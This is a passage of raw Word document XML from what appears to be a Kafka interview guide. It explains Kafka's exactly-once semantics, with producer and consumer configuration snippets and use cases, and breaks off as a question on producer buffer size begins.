    <w:p w14:paraId="6CEB099C"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s allow for atomic message writes, ensuring that all messages in a transaction are either written successfully or discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDC8BF4"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tomicity and Durability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF1C0D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transactional model ensures that both producers and consumers can safely handle failures without data loss or duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4780EB73"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418" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D051AB6" w14:textId="61856F9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56" w:name="_Toc197868070"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kafka’s exactly-once semantics, the configuration required to achieve it, and the scenarios where this feature is critical</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="856"/>
    </w:p>
    <w:p w14:paraId="25B32115" w14:textId="4FEF1A98" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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408DD3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Exactly-Once Semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka ensures that a message is </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>neither lost nor processed more than once</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It provides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w:t>
      </w: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 xml:space="preserve"> pipelines, which is essential for ensuring data integrity in certain applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431BAF3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particularly critical in systems that require </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strong consistency guarantees</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as financial transactions, order processing, or event sourcing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181CE2B0"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5BA8D">
          <v:rect id="_x0000_i3419" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2731456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Exactly-Once Semantics (EOS) Works in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FE3CC"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EOS is implemented through a combination of two key features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3612D41D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B602F8F"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ensures that a message is written only once, even if the producer retries due to network failures or timeouts. It prevents the duplication of messages when retrying after an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D3E52"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 and Consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1C7A34"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send messages in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either all messages in a transaction are successfully written or none are (atomicity). This ensures that partial writes don't result in inconsistent data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E88C906"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ensuring that they only process committed messages and avoid duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4094C47F"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2942F">
          <v:rect id="_x0000_i3420" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26430365"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for Achieving Exactly-Once Semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E6099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 Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B09CB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in Kafka producers, the following settings need to be configured:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C84746"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nable.idempotence=true</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This enables idempotent production, ensuring that Kafka brokers will avoid writing duplicate messages with the same producer and sequence numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BC7E8B"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 transactional.id</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When using Kafka transactions, the producer needs to be configured with a transactional.id to allow Kafka to track and commit transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F778E"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Transactional Producer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AA73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achieve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using Kafka's transaction model, the following steps are necessary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31182BB2"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Ensures that the producer waits for acknowledgment from all replicas before considering the write successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07512A01"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id</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This configuration enables the producer to manage a transactional ID to track the messages sent within a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC50FC6"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begins a transaction with </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>beginTransaction()</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, sends messages, and finally commits the transaction with </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>commitTransaction()</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. If an error occurs, the producer can abort the transaction using </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abortTransaction()</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FB0D99"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1B458B4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s to read committed messages (ensuring that messages are processed exactly once), the following configuration is crucial:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD4E27" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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successfully committed. This prevents consumers from reading messages that are part of a transaction but not yet committed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC17D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setting the isolation.level to read_committed, the consumer will only receive messages that have been fully committed, preventing it from processing uncommitted or incomplete messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721A8B1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B8434">
          <v:rect id="_x0000_i3421" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F579772"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s Where Exactly-Once Semantics Is Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E59EE5E"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nancial Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A7307"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financial applications, such as banking, each transaction needs to be processed </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly once</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Duplicating a transaction (e.g., double-spending) or missing a transaction can result in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>serious financial discrepancies</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB9615"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ensures that a bank’s transaction history is accurate, and no transaction is either duplicated or lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3779627F"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 Processing Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C46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commerce platforms need to guarantee that an order is processed exactly once. </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Duplicate orders</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can lead to inventory issues, customer dissatisfaction, or financial discrepancies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775CCAEA"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OS ensures that orders are not accidentally duplicated, especially when there are retries due to network failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE17229"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0CE5722E"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e.g., CQRS - Command Query Responsibility Segregation), events must be processed exactly once to maintain consistent system states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5959F5A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duplicate event could lead to incorrect system state or business logic errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B32B2B4"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nalytics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FEA0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real-time analytics or data processing pipelines, duplicate data can distort analysis, leading to incorrect conclusions and reports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6C7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guarantees that data is processed exactly once, making the system’s output reliable and consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CAA901"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Systems with Multiple Microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC269D8"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microservice architectures, different services often rely on Kafka to communicate. Ensuring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and processing is critical to avoid errors like processing the same event multiple times (e.g., order creation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2663858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EOS, errors like double payments or order duplications can occur when retrying events due to network issues or service failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53070BE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B6A0C">
          <v:rect id="_x0000_i3422" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5061423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teps to Achieve Exactly-Once Semantics in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E35030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12C20A59"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Set acks=all and enable.idempotence=true to prevent duplicate messages due to retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3913B3E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Set transactional.id and manage the transaction lifecycle using beginTransaction(), commitTransaction(), and abortTransaction() to ensure atomicity of multiple messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E967E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6C43F19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figure the consumer with </w:t>
      </w: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xml:space="preserve"> to only process committed messages and avoid consuming incomplete or duplicate messages from uncommitted transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0598248C"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mit offsets only after processing the messages successfully to avoid re-processing in case of failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BEB78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0402C">
          <v:rect id="_x0000_i3423" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0794418A"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Code Snippets for EOS Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA3102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ducer Configuration for EOS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AF1A1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F886BC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F9B641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775BCC8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 // Enable idempotency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C323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serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342D1D8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serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D3A4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transactional.id", "txn-1"); // Enable transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5513BE" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE3545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lt;String, String&gt; producer = new KafkaProducer&lt;&gt;(props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0526574F" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF027C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tart transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A339C7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beginTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0907706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y {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F149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send(new ProducerRecord&lt;&gt;("topic", "key", "value"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297535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Commit transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108C918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ommitTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB83EC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ProducerFencedException | OutOfOrderSequenceException | AuthorizationException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664D95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fatal errors, may not proceed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961292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lose();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F73B6E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KafkaException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053C5C3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ient errors, may be retried</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA687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abortTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F76B02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7511CBD"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sumer Configuration for EOS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC8649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BC6C35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134121C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group.id", "group1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B966E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auto.commit", "false");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD41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isolation.level", "read_committed"); // Read only committed messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB0CB3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deserializer", "org.apache.kafka.common.serialization.StringDeserializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557126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deserializer", "org.apache.kafka.common.serialization.StringDeserializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CC5F43" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6F78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s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E62A4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Collections.singletonList("topic"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19412AFE" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741B01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B09104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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C3955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2B461BD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BA758D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1E07A6A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691A5F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commitSync(); // Commit offsets after processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C97F4C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C9560AA"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AAD4D1">
          <v:rect id="_x0000_i3424" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AA1758"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D4E970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provides a powerful guarantee for ensuring the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reliable processing of messages</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without duplicates or data loss. This feature is implemented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both producers and consumers maintain strong consistency even in the event of failures or retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B04144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configuring Kafka producers and consumers appropriately (with acks=all, enable.idempotence=true, transactional.id, and isolation.level=read_committed), developers can implement systems that need </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>critical data integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—such as financial transactions, order processing, and event sourcing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B89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essential for building </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>robust, high-integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data pipelines in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, making it one of the core features for Kafka when data consistency is crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE940E" w14:textId="509BB41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425" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2B20D" w14:textId="502F17B2"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57" w:name="_Toc197868071"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the impact of Kafka's producer buffer size on message delivery</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="857"/>
    </w:p>
    <w:p w14:paraId="496A1564" w14:textId="7ED3D468" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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Kafka's Producer Buffer Size on Message Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C3742D"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plays a critical role in how efficiently messages are sent to Kafka brokers and impacts message delivery in several ways. The buffer size affects the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liability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of message delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364C837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maintain an </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in-memory buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
